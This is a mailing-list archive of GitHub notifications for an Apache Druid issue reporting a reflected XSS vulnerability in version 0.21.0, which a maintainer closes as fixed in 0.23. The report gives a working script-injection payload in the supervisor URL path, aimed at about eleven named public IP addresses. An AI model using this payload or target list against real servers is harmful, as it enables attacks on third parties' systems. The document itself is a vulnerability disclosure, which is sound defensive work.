You are viewing a plain text version of this content. The canonical link for it is here.

Posted to commits@druid.apache.org by GitBox <gi...@apache.org> on 2022/09/07 10:29:02 UTC

[GitHub] [druid] vsuppor opened a new issue, #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

vsuppor opened a new issue, #13044:
URL: https://github.com/apache/druid/issues/13044

   Apache Druid version 0.21.0 has a reflection type XSS vulnerability, attackers malicious construction of JS code to attack the front page.
   [http://183.63.81.38:8888/](http://183.63.81.38:8888/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://3.228.8.1:8090/](http://3.228.8.1:8090/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://171.244.30.202:8081/druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>](http://171.244.30.202:8081/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)
   
   [http://171.244.30.202:8889/](http://171.244.30.202:8889/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://18.216.61.96:8888/](http://18.216.61.96:8888/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://124.71.176.92:8888/](http://124.71.176.92:8888/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://144.126.219.141:8081/](http://144.126.219.141:8081/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://171.244.30.202:8090/](http://171.244.30.202:8090/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://44.193.15.82:8090/](http://44.193.15.82:8090/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://223.16.237.12:8888/](http://223.16.237.12:8888/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   
   [http://44.193.15.82:8081/](http://44.193.15.82:8081/druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E)druid/indexer/v1/supervisor/1<ScRiPt>alert%289637%29<%2FScRiPt>
   ![image](https://user-images.githubusercontent.com/113024228/188856457-34c0092e-909f-4bd3-b5a0-d4728c5d38af.png)
   ![image](https://user-images.githubusercontent.com/113024228/188856489-e4b68daf-b99c-4f33-ba31-0c1580b85806.png)
   ![image](https://user-images.githubusercontent.com/113024228/188856516-f3a671a9-d36c-4a81-a606-eb20423eecb8.png)
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org

[GitHub] [druid] vsuppor commented on issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.

vsuppor commented on issue #13044:
URL: https://github.com/apache/druid/issues/13044#issuecomment-1239397241

   你好。已收到你的邮件，我会在假期结束后尽快处理。<script>alert(1)</script><script>alert(1)</script><script>alert(1)</script>————————————这是来自QQ邮箱的自动回复邮件。


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org

[GitHub] [druid] FrankChen021 commented on issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.

FrankChen021 commented on issue #13044:
URL: https://github.com/apache/druid/issues/13044#issuecomment-1239396898

   Thanks for the reporting. This problem has been addressed in 0.23


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org

[GitHub] [druid] FrankChen021 closed issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.

FrankChen021 closed issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability
URL: https://github.com/apache/druid/issues/13044


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org